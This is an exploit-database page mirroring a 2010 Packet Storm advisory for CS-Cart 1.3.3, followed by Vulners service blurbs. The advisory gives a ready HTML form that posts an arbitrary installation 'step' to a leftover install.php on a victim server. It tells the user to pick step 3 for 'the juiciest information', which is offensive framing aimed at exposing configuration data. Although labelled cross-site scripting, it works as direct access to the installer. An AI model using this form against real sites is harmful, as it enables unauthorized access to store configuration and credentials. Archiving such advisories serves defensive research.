Lucene search
K

CS Cart 1.3.3 Cross Site Scripting

🗓️ 11 Sep 2010 00:00:00Reported by LogicGateType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 13 Views

CS Cart 1.3.3 Cross Site Scripting vulnerability in install.ph

Code
`# Exploit Title: [CS CART 1.3.3 INSTALL.PHP XSS]  
# Date: [2010-09-08]  
# Author: [LogicGate]  
# Software Link: [http://cs-cart.smartcode.com/]  
# Version: [1.3.3]  
# Tested on: [N/A]  
# CVE : [N/A]  
  
If "install.php" was not removed after installation simply make an html file with the following code and replace <Victim Server> by the PATH to "install.php" example:"http://www.nonexistant.com/install.php":  
  
<html>  
<form name="installform" method="post" action="http://<Victim Ip>/install.php">  
<input type="text" name="step">  
<input type="submit" id="nextbut" value="xss">  
</form>  
</html>  
  
After that open the HTML file you have just created and enter which ever step of the installation you would like to access. Step "3" is where the juiciest information is.  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation